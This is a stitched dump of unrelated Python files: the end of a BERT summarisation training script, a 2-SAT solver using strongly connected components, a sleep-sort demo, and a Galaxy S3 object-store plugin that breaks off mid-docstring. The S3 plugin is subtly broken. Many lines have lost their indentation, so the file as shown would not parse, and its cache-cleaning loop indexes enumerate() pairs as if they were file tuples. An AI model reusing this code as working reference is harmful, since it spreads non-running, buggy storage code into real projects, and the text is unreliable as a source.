        raise Exception(msg)
def train(args, device_id):
    """Dispatch training: multi-process when world_size > 1, otherwise a
    single local process on device_id."""
    if args.world_size <= 1:
        train_single(args, device_id)
        return
    train_multi(args)
def train_single(args, device_id):
    """Single-process training loop setup: seed RNGs, optionally restore a
    checkpoint, build tokenizer/model/optimizer(s)/trainer, then train."""
    init_logger(args.log_file)
    logger.info(str(args))
    device = "cpu" if args.visible_gpus == '-1' else "cuda"
    logger.info('Device ID %d' % device_id)
    logger.info('Device %s' % device)
    if device_id >= 0:
        torch.cuda.set_device(device_id)
        torch.cuda.manual_seed(args.seed)
    if args.train_from != '':
        logger.info('Loading checkpoint from %s' % args.train_from)
        # map_location keeps tensors on CPU so the load works on any device.
        checkpoint = torch.load(args.train_from,
                                map_location=lambda storage, loc: storage)
        opt = vars(checkpoint['opt'])
        # Restore only architecture flags from the checkpoint; all other
        # command-line options keep their current values.
        for k in opt.keys():
            if (k in model_flags):
                setattr(args, k, opt[k])
    else:
        checkpoint = None
    # Seed every RNG source for reproducibility.
    torch.manual_seed(args.seed)
    np.random.seed(args.seed)
    random.seed(args.seed)
    torch.backends.cudnn.deterministic = True

    def train_iter_fct():
        # Fresh training data iterator for each pass over the dataset.
        return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True),
                                      args.batch_size, args.batch_ex_size, device,
                                      shuffle=True, is_test=False)
    tokenizer = BertTokenizer.from_pretrained(args.tokenizer)
    if args.use_graph:
        model = graph_model(args, device, tokenizer.vocab, checkpoint)
    else:
        model = seq2seq_model(args, device, tokenizer.vocab, checkpoint)
    if args.train_from_ignore_optim:
        # Keep the restored weights but discard saved optimizer state.
        checkpoint = None
    if args.sep_optim and args.encoder == 'bert':
        # Separate schedules: one optimizer for BERT, one for everything else.
        optim_bert = build_optim_bert(args, model, checkpoint)
        optim_other = build_optim_other(args, model, checkpoint)
        optim = [optim_bert, optim_other]
    else:
        optim = [build_optim(args, model, checkpoint, args.warmup)]
    logger.info(model)
    if args.use_graph:
        trainer = graph_build_trainer(args, device_id, model, optim, tokenizer)
    else:
        trainer = seq2seq_build_trainer(args, device_id, model, optim, tokenizer)
    trainer.train(train_iter_fct, args.train_steps)
|
circuit_design V2.py | # python3
#https://www.geeksforgeeks.org/2-satisfiability-2-sat-problem/
#https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
#https://stackoverflow.com/questions/4664050/iterative-depth-first-tree-traversal-with-pre-and-post-visit-at-each-node/60803684#60803684
import sys
import threading
# The SCC pass below recurses once per vertex (up to 2n deep), so raise the
# interpreter's recursion ceiling and give the worker thread a 64 MiB stack.
sys.setrecursionlimit(10**6)
threading.stack_size(2**26)
DEBUG = False
#DEBUG = True
#LOG = True
LOG = False
# Debug mode reads the instance from a local test fixture instead of stdin.
if DEBUG: test = open("tests\\06", "r")
def lit_to_vertex(lit):
    """Map a signed 1-based literal to its implication-graph vertex.

    Variable k occupies vertices 2*(k-1) (negated) and 2*(k-1)+1 (positive).
    """
    base = (abs(lit) - 1) * 2
    return base + 1 if lit > 0 else base
def vertex_to_lit(v):
    """Inverse of lit_to_vertex: map a vertex index back to a signed literal.

    Odd vertices are positive literals, even vertices negated ones; written
    so the -1 offset can only ever apply on the negated branch (the original
    formulation made that scoping easy to break by mis-indenting `lit -= 1`).
    """
    var = v // 2 + 1  # 1-based variable number
    return var if v % 2 == 1 else -var
class Node():
    """Per-vertex DFS bookkeeping used by both SCC passes."""

    def __init__(self):
        # pre/post visit clock stamps (set during DFS).
        self.pre = None
        self.post = None
        # component label assigned by the current DFS pass.
        self.area = None
        # whether DFS has reached this vertex yet.
        self.visited = False
def DFS(x, area, g, ad, sort):
    """Recursive depth-first search from vertex x.

    Labels every reachable unvisited vertex with `area`, stamps pre/post
    visit times from the global `clock`, and records each vertex into
    `sort` at its post-visit time, so scanning `sort` by index yields the
    vertices in post-order.

    g    -- list of Node bookkeeping objects (mutated)
    ad   -- adjacency list of the graph being searched
    sort -- clock-indexed output array for the post-order
    """
    def previsit(x):
        global clock
        g[x].pre = clock
        clock += 1

    def postvisit(x):
        global clock
        g[x].post = clock
        # Record vertex at its post-visit time; `sort` read in index order
        # is therefore the post-order sequence (no explicit sort needed).
        sort[clock] = x
        clock += 1
    global clock
    g[x].visited = True
    g[x].area = area
    previsit(x)
    for w in ad[x]:
        if (not g[w].visited):
            DFS(w, area, g, ad, sort)
    postvisit(x)
    return None
def getSCC(adj, R_adj, G, GR):
    """Kosaraju's algorithm: DFS the reversed graph to obtain a post-order,
    then DFS the forward graph in reverse post-order; each forward DFS tree
    is one strongly connected component.

    Side effects: labels G[v].area with the SCC id of each vertex and leaves
    the reversed-graph post-order in the global `order` (used later by solve).
    Returns the number of SCCs.
    """
    area = 0
    global order
    # clock starts at 1 and ticks twice per vertex, so reserve 2*V+1 slots;
    # unused slots stay None and are filtered out below.
    order = [None] * (2 * len(R_adj) + 1)
    global clock
    clock = 1
    # Pass 1: post-order on the reversed graph.
    for v in range(len(R_adj)):
        if (not GR[v].visited):
            DFS(v, area, GR, R_adj, order)
            area += 1
    # Compact the clock-indexed array into the actual post-order sequence.
    order = [x for x in order if x is not None]
    SCC = 0
    # Pass 2: forward graph in reverse post-order; post-order output unused.
    dummy = [None] * (2 * len(R_adj) + 1)
    clock = 1
    for x in reversed(order):
        if (not G[x].visited):
            DFS(x, SCC, G, adj, dummy)
            SCC += 1
    return SCC
def isSatisfiable(G):
    """A 2-SAT instance is satisfiable iff no variable ends up in the same
    SCC as its negation (uses the global variable count `n`)."""
    return all(
        G[lit_to_vertex(v)].area != G[lit_to_vertex(-v)].area
        for v in range(1, n + 1)
    )
def createEdges():
    """Build the implication-graph edges from the global `clauses`.

    Clause (a OR b) contributes the implications (NOT a -> b) and
    (NOT b -> a); the reversed edge list is built alongside for the
    first Kosaraju pass.
    """
    edges = []
    reversed_edges = []
    for a, b in clauses:
        u, v = lit_to_vertex(-a), lit_to_vertex(b)
        edges.append((u, v))
        reversed_edges.append((v, u))
        u, v = lit_to_vertex(-b), lit_to_vertex(a)
        edges.append((u, v))
        reversed_edges.append((v, u))
    return edges, reversed_edges
def solve():
    """Derive one satisfying assignment from the reverse post-order in the
    global `order`: the first time a variable's vertex appears, assign it
    according to that literal's sign (1 for positive, 0 for negated).

    Returns a list of n values in {0, 1}, indexed by variable number - 1.

    Cleanup: removed the unused local `area` and stale commented-out code
    from the previous version.
    """
    solution = [None] * n
    for x in reversed(order):
        lit = vertex_to_lit(x)
        index = abs(lit) - 1
        if solution[index] is None:
            solution[index] = 1 if lit > 0 else 0
    return solution
def main():
    """Read a 2-SAT instance (n variables, m clauses), build the implication
    graph, run SCC, and print a satisfying assignment or UNSATISFIABLE."""
    global n, m, clauses
    if DEBUG:
        n, m = map(int, test.readline().split())
        clauses = [ list(map(int, test.readline().split())) for i in range(m) ]
    else:
        n, m = map(int, input().split())
        clauses = [ list(map(int, input().split())) for i in range(m) ]
    # Implication graph: 2 vertices per variable (positive / negated).
    edges, reversed_edges = createEdges()
    adj = [[] for _ in range(2*n)]
    R_adj = [[] for _ in range(2*n)]
    for (a, b) in edges:
        adj[a].append(b)
    for (a, b) in reversed_edges:
        R_adj[a].append(b)
    global clock
    clock = 1
    # Separate bookkeeping for forward (G) and reversed (R) DFS passes.
    G = [Node() for i in range(len(adj))]
    R = [Node() for i in range(len(R_adj))]
    SCC = getSCC(adj, R_adj, G, R)
    if isSatisfiable(G):
        print("SATISFIABLE");
        solution = solve()
        # Variable i+1 prints positive when assigned 1, negated otherwise.
        print(" ".join(str(i+1 if solution[i] else -(i+1)) for i in range(n)))
    else:
        print("UNSATISFIABLE")
#main()
# This is to avoid stack overflow issues: main() runs in a worker thread that
# gets the enlarged stack configured via threading.stack_size() above.
threading.Thread(target=main).start()
|
sleep_sort.py | # !/usr/bin/env python3
from time import sleep
from random import randint
from threading import Thread
def target(n, value):
    """Sleep-sort worker: wait `n` seconds, then append `value` to the shared
    result list. list.append is a single atomic operation in CPython, so the
    concurrent appends are presumed safe without a lock."""
    global sorted_list
    sleep(n)
    sorted_list.append(value)
# Sleep-sort a random list: each element sleeps for a delay proportional to
# its rank within [min, max], then appends itself to sorted_list.
unsort_list, sorted_list = [randint(-100, 100) for _ in range(randint(10, 20))], []
print(unsort_list)
max_value = max(unsort_list)
min_value = min(unsort_list)
# Guard the degenerate all-equal case (the original divided by zero there).
spread = (max_value - min_value) or 1
threads = [
    Thread(target=target, args=((item - min_value) / spread, item))
    for item in unsort_list
]
for t in threads:
    t.start()
# Join every worker instead of a fixed sleep(1): the largest normalized delay
# is exactly 1.0 s, so the fixed wait could print before the last append.
for t in threads:
    t.join()
print(sorted_list)
s3.py | """
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectNotFound, ObjectInvalid
from galaxy.util import string_as_bool, umask_fix_perms, safe_relpath, directory_hash_id
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import ObjectStore, convert_bytes
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger( __name__ )
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
    def __init__(self, config, config_xml):
        """Wire up the store: parse the XML configuration, open the S3
        connection, resolve the bucket, and (when a cache size limit is
        configured) start the background cache-cleaning thread."""
        if boto is None:
            raise Exception(NO_BOTO_ERROR_MESSAGE)
        super(S3ObjectStore, self).__init__(config)
        self.staging_path = self.config.file_path
        self.transfer_progress = 0
        self._parse_config_xml(config_xml)
        self._configure_connection()
        self.bucket = self._get_bucket(self.bucket)
        # Clean cache only if value is set in galaxy.ini
        if self.cache_size != -1:
            # Convert GBs to bytes for comparison
            self.cache_size = self.cache_size * 1073741824
            # Helper for interruptable sleep
            self.sleeper = Sleeper()
            self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
            self.cache_monitor_thread.start()
            log.info("Cache cleaner manager started")
        # Test if 'axel' is available for parallel download and pull the key into cache
        try:
            subprocess.call('axel')
            self.use_axel = True
        except OSError:
            # axel binary not installed; fall back to boto's single-stream download.
            self.use_axel = False
def _configure_connection(self):
log.debug("Configuring S3 Connection")
self.conn = S3Connection(self.access_key, self.secret_key)
    def _parse_config_xml(self, config_xml):
        """Populate auth, bucket, connection, cache and extra-dir settings
        from the object store's XML configuration element.

        Any missing/malformed element is logged and then re-raised, since the
        store cannot operate without a complete configuration.
        """
        try:
            a_xml = config_xml.findall('auth')[0]
            self.access_key = a_xml.get('access_key')
            self.secret_key = a_xml.get('secret_key')
            b_xml = config_xml.findall('bucket')[0]
            self.bucket = b_xml.get('name')
            self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
            self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
            # The <connection> element is optional; an empty dict makes the
            # .get() calls below fall back to their defaults.
            cn_xml = config_xml.findall('connection')
            if not cn_xml:
                cn_xml = {}
            else:
                cn_xml = cn_xml[0]
            self.host = cn_xml.get('host', None)
            self.port = int(cn_xml.get('port', 6000))
            self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
            self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
            self.conn_path = cn_xml.get('conn_path', '/')
            c_xml = config_xml.findall('cache')[0]
            self.cache_size = float(c_xml.get('size', -1))
            self.staging_path = c_xml.get('path', self.config.object_store_cache_path)
            for d_xml in config_xml.findall('extra_dir'):
                self.extra_dirs[d_xml.get('type')] = d_xml.get('path')
            log.debug("Object cache dir: %s", self.staging_path)
            log.debug(" job work dir: %s", self.extra_dirs['job_work'])
            # Connection settings bundled for the multipart upload helper.
            self.s3server = {'access_key': self.access_key,
                             'secret_key': self.secret_key,
                             'is_secure': self.is_secure,
                             'max_chunk_size': self.max_chunk_size,
                             'host': self.host,
                             'port': self.port,
                             'use_rr': self.use_rr,
                             'conn_path': self.conn_path}
        except Exception:
            # Toss it back up after logging, we can't continue loading at this point.
            log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
            raise
    def __cache_monitor(self):
        """Background loop: periodically walk the cache directory and, once
        usage exceeds 90% of the configured limit, evict files starting from
        the least recently accessed until usage is back under the limit."""
        time.sleep(2)  # Wait for things to load before starting the monitor
        while self.running:
            total_size = 0
            # Is this going to be too expensive of an operation to be done frequently?
            file_list = []
            for dirpath, _, filenames in os.walk(self.staging_path):
                for filename in filenames:
                    filepath = os.path.join(dirpath, filename)
                    file_size = os.path.getsize(filepath)
                    total_size += file_size
                    # Get the time given file was last accessed (stat field 7 = st_atime)
                    last_access_time = time.localtime(os.stat(filepath)[7])
                    # Compose a tuple of the access time and the file path
                    file_tuple = last_access_time, filepath, file_size
                    file_list.append(file_tuple)
            # Sort the file list (based on access time) so eviction is LRU-first.
            file_list.sort()
            # Initiate cleaning once within 10% of the defined cache size?
            cache_limit = self.cache_size * 0.9
            if total_size > cache_limit:
                log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
                         convert_bytes(total_size), convert_bytes(cache_limit))
                # For now, delete enough to leave at least 10% of the total cache free
                delete_this_much = total_size - cache_limit
                self.__clean_cache(file_list, delete_this_much)
            self.sleeper.sleep(30)  # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
    def _get_bucket(self, bucket_name):
        """Sometimes a handle to a bucket is not established right away so try
        it a few times. Raise error if connection is not established.

        Attempts the lookup 5 times, creating the bucket when it is missing
        (a freshly created bucket may not be visible immediately).
        """
        for i in range(5):
            try:
                bucket = self.conn.get_bucket(bucket_name)
                log.debug("Using cloud object store with bucket '%s'", bucket.name)
                return bucket
            except S3ResponseError:
                try:
                    log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
                    self.conn.create_bucket(bucket_name)
                except S3ResponseError:
                    log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
                    time.sleep(2)
        # All the attempts have been exhausted and connection was not established,
        # raise error
        # NOTE(review): S3ResponseError normally takes (status, reason) args;
        # raising the bare class here likely fails with a TypeError instead —
        # consider raising a clearer, constructible exception.
        raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms( path, self.config.umask, 0o666, self.config.gid )
    def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
        """Build the S3 key (or, with base_dir, a local path) for obj.

        Layout: <hashed id dirs>[/extra_dir][/obj.id]/dataset_<id>.dat, with
        extra_dir optionally prepended at the root and alt_name overriding the
        file name. Raises ObjectInvalid on any path-escape attempt.
        """
        # extra_dir should never be constructed from provided data but just
        # make sure there are no shenannigans afoot
        if extra_dir and extra_dir != os.path.normpath(extra_dir):
            log.warning('extra_dir is not normalized: %s', extra_dir)
            raise ObjectInvalid("The requested object is invalid")
        # ensure that any parent directory references in alt_name would not
        # result in a path not contained in the directory path constructed here
        if alt_name:
            if not safe_relpath(alt_name):
                log.warning('alt_name would locate path outside dir: %s', alt_name)
                raise ObjectInvalid("The requested object is invalid")
            # alt_name can contain parent directory references, but S3 will not
            # follow them, so if they are valid we normalize them out
            alt_name = os.path.normpath(alt_name)
        rel_path = os.path.join(*directory_hash_id(obj.id))
        if extra_dir is not None:
            if extra_dir_at_root:
                rel_path = os.path.join(extra_dir, rel_path)
            else:
                rel_path = os.path.join(rel_path, extra_dir)
        # for JOB_WORK directory
        if obj_dir:
            rel_path = os.path.join(rel_path, str(obj.id))
        if base_dir:
            base = self.extra_dirs.get(base_dir)
            return os.path.join(base, rel_path)
        # S3 folders are marked by having trailing '/' so add it now
        rel_path = '%s/' % rel_path
        if not dir_only:
            rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
        return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
    def _get_transfer_progress(self):
        # Progress counter incremented by _transfer_cb during boto transfers.
        return self.transfer_progress
def _get_size_in_s3(self, rel_path):
try:
key = self.bucket.get_key(rel_path)
if key:
return key.size
except S3ResponseError:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
    def _key_exists(self, rel_path):
        """Return True if rel_path exists in the bucket; a trailing '/' marks
        a 'folder', whose existence is tested via a prefix listing."""
        exists = False
        try:
            # A hackish way of testing if the rel_path is a folder vs a file
            is_dir = rel_path[-1] == '/'
            if is_dir:
                # Folders are virtual on S3: existence == any key under prefix.
                keyresult = self.bucket.get_all_keys(prefix=rel_path)
                if len(keyresult) > 0:
                    exists = True
                else:
                    exists = False
            else:
                key = Key(self.bucket, rel_path)
                exists = key.exists()
        except S3ResponseError:
            log.exception("Trouble checking existence of S3 key '%s'", rel_path)
            return False
        # NOTE(review): presumably a hard assert against absolute paths, but a
        # bare `raise` outside an except clause raises RuntimeError — confirm
        # intent and replace with an explicit exception.
        if rel_path[0] == '/':
            raise
        return exists
    def _in_cache(self, rel_path):
        """ Check if the given dataset is in the local cache and return True if so. """
        # log.debug("------ Checking cache for rel_path %s" % rel_path)
        cache_path = self._get_cache_path(rel_path)
        return os.path.exists(cache_path)
        # TODO: Part of checking if a file is in cache should be to ensure the
        # size of the cached file matches that on S3. Once the upload tool explicitly
        # creates, this check sould be implemented- in the mean time, it's not
        # looking likely to be implementable reliably.
        # if os.path.exists(cache_path):
        #     # print "***1 %s exists" % cache_path
        #     if self._key_exists(rel_path):
        #         # print "***2 %s exists in S3" % rel_path
        #         # Make sure the size in cache is available in its entirety
        #         # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
        #         if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
        #             # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
        #             exists = True
        #         else:
        #             # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
        #             exists = False
        #     else:
        #         # Although not perfect decision making, this most likely means
        #         # that the file is currently being uploaded
        #         # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
        #         exists = True
        # else:
        #     return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
    def _transfer_cb(self, complete, total):
        # boto progress callback: invoked num_cb (=10) times per transfer, so
        # a fixed +10 per call approximates percent complete.
        self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
    def _push_to_os(self, rel_path, source_file=None, from_string=None):
        """
        Push the file pointed to by ``rel_path`` to the object store naming the key
        ``rel_path``. If ``source_file`` is provided, push that file instead while
        still using ``rel_path`` as the key name.
        If ``from_string`` is provided, set contents of the file to the value of
        the string.

        Returns True on success, False/None on failure.
        """
        try:
            source_file = source_file if source_file else self._get_cache_path(rel_path)
            if os.path.exists(source_file):
                key = Key(self.bucket, rel_path)
                # Skip 0-byte overwrites of existing keys (likely a placeholder).
                if os.path.getsize(source_file) == 0 and key.exists():
                    log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
                    return True
                if from_string:
                    key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
                    log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
                else:
                    start_time = datetime.now()
                    log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
                    mb_size = os.path.getsize(source_file) / 1e6
                    # Multipart upload for files >= 10 MB (when enabled).
                    if mb_size < 10 or (not self.multipart):
                        self.transfer_progress = 0  # Reset transfer progress counter
                        key.set_contents_from_filename(source_file,
                                                       reduced_redundancy=self.use_rr,
                                                       cb=self._transfer_cb,
                                                       num_cb=10)
                    else:
                        multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
                    end_time = datetime.now()
                    log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
                              source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
                return True
            else:
                # NOTE(review): this branch falls through returning None
                # (falsy) rather than an explicit False — confirm intent.
                log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
                          rel_path, source_file)
        except S3ResponseError:
            log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
        return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
return False
    def exists(self, obj, **kwargs):
        """Return True if obj exists in the local cache or in S3.

        Side effect: when the object exists only in the cache, it is pushed
        up to S3 before returning True (see TODO below).
        """
        in_cache = in_s3 = False
        rel_path = self._construct_path(obj, **kwargs)
        # Check cache
        if self._in_cache(rel_path):
            in_cache = True
        # Check S3
        in_s3 = self._key_exists(rel_path)
        # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
        # dir_only does not get synced so shortcut the decision
        dir_only = kwargs.get('dir_only', False)
        base_dir = kwargs.get('base_dir', None)
        if dir_only:
            if in_cache or in_s3:
                return True
            # for JOB_WORK directory: create the local dir on demand
            elif base_dir:
                if not os.path.exists(rel_path):
                    os.makedirs(rel_path)
                return True
            else:
                return False
        # TODO: Sync should probably not be done here. Add this to an async upload stack?
        if in_cache and not in_s3:
            self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
            return True
        elif in_s3:
            return True
        else:
            return False
    def create(self, obj, **kwargs):
        """Create the dataset placeholder: the hashed directory structure in
        the local cache and, unless dir_only, an empty file in cache and an
        empty key in S3. No-op when the object already exists."""
        if not self.exists(obj, **kwargs):
            # Pull out locally used fields
            extra_dir = kwargs.get('extra_dir', None)
            extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
            dir_only = kwargs.get('dir_only', False)
            alt_name = kwargs.get('alt_name', None)
            # Construct hashed path
            rel_path = os.path.join(*directory_hash_id(obj.id))
            # Optionally append extra_dir
            if extra_dir is not None:
                if extra_dir_at_root:
                    rel_path = os.path.join(extra_dir, rel_path)
                else:
                    rel_path = os.path.join(rel_path, extra_dir)
            # Create given directory in cache
            cache_dir = os.path.join(self.staging_path, rel_path)
            if not os.path.exists(cache_dir):
                os.makedirs(cache_dir)
            # Although not really necessary to create S3 folders (because S3 has
            # flat namespace), do so for consistency with the regular file system
            # S3 folders are marked by having trailing '/' so add it now
            # s3_dir = '%s/' % rel_path
            # self._push_to_os(s3_dir, from_string='')
            # If instructed, create the dataset in cache & in S3
            if not dir_only:
                rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
                open(os.path.join(self.staging_path, rel_path), 'w').close()
                self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound( 'objectstore.empty, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
    def size(self, obj, **kwargs):
        """Return the dataset size in bytes: from the local cache when present,
        otherwise from S3; 0 when the dataset cannot be found at all."""
        rel_path = self._construct_path(obj, **kwargs)
        if self._in_cache(rel_path):
            try:
                return os.path.getsize(self._get_cache_path(rel_path))
            except OSError as ex:
                # Cached copy vanished between the existence check and stat;
                # fall through to the S3 lookup below.
                log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
        elif self.exists(obj, **kwargs):
            return self._get_size_in_s3(rel_path)
        log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
        return 0
    def delete(self, obj, entire_dir=False, **kwargs):
        """Delete the dataset from cache and S3 (or a whole directory tree
        when entire_dir/extra_dir is set). Return True on success."""
        rel_path = self._construct_path(obj, **kwargs)
        extra_dir = kwargs.get('extra_dir', None)
        base_dir = kwargs.get('base_dir', None)
        dir_only = kwargs.get('dir_only', False)
        obj_dir = kwargs.get('obj_dir', False)
        try:
            # Remove temporary data in JOB_WORK directory (local only).
            if base_dir and dir_only and obj_dir:
                shutil.rmtree(os.path.abspath(rel_path))
                return True
            # For the case of extra_files, because we don't have a reference to
            # individual files/keys we need to remove the entire directory structure
            # with all the files in it. This is easy for the local file system,
            # but requires iterating through each individual key in S3 and deleting it.
            if entire_dir and extra_dir:
                shutil.rmtree(self._get_cache_path(rel_path))
                results = self.bucket.get_all_keys(prefix=rel_path)
                for key in results:
                    log.debug("Deleting key %s", key.name)
                    key.delete()
                return True
            else:
                # Delete from cache first
                os.unlink(self._get_cache_path(rel_path))
                # Delete from S3 as well
                if self._key_exists(rel_path):
                    key = Key(self.bucket, rel_path)
                    log.debug("Deleting key %s", key.name)
                    key.delete()
                    return True
        except S3ResponseError:
            log.exception("Could not delete key '%s' from S3", rel_path)
        except OSError:
            log.exception('%s delete error', self.get_filename(obj, **kwargs))
        return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
    def get_filename(self, obj, **kwargs):
        """Return a local filesystem path for the dataset, pulling it into the
        cache from S3 when needed. Raises ObjectNotFound when the dataset
        cannot be located or downloaded."""
        base_dir = kwargs.get('base_dir', None)
        dir_only = kwargs.get('dir_only', False)
        obj_dir = kwargs.get('obj_dir', False)
        rel_path = self._construct_path(obj, **kwargs)
        # for JOB_WORK directory: plain local path, no cache involved
        if base_dir and dir_only and obj_dir:
            return os.path.abspath(rel_path)
        cache_path = self._get_cache_path(rel_path)
        # S3 does not recognize directories as files so cannot check if those exist.
        # So, if checking dir only, ensure given dir exists in cache and return
        # the expected cache path.
        # dir_only = kwargs.get('dir_only', False)
        # if dir_only:
        #     if not os.path.exists(cache_path):
        #         os.makedirs(cache_path)
        #     return cache_path
        # Check if the file exists in the cache first
        if self._in_cache(rel_path):
            return cache_path
        # Check if the file exists in persistent storage and, if it does, pull it into cache
        elif self.exists(obj, **kwargs):
            if dir_only:  # Directories do not get pulled into cache
                return cache_path
            else:
                if self._pull_into_cache(rel_path):
                    return cache_path
        # For the case of retrieving a directory only, return the expected path
        # even if it does not exist.
        # if dir_only:
        #     return cache_path
        raise ObjectNotFound( 'objectstore.get_filename, no cache_path: %s, kwargs: %s'
                              % ( str( obj ), str( kwargs ) ) )
        # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
    def update_from_file(self, obj, file_name=None, create=False, **kwargs):
        """Replace the dataset's contents with file_name (or its own cached
        copy), then push the result to S3. With create=True the object is
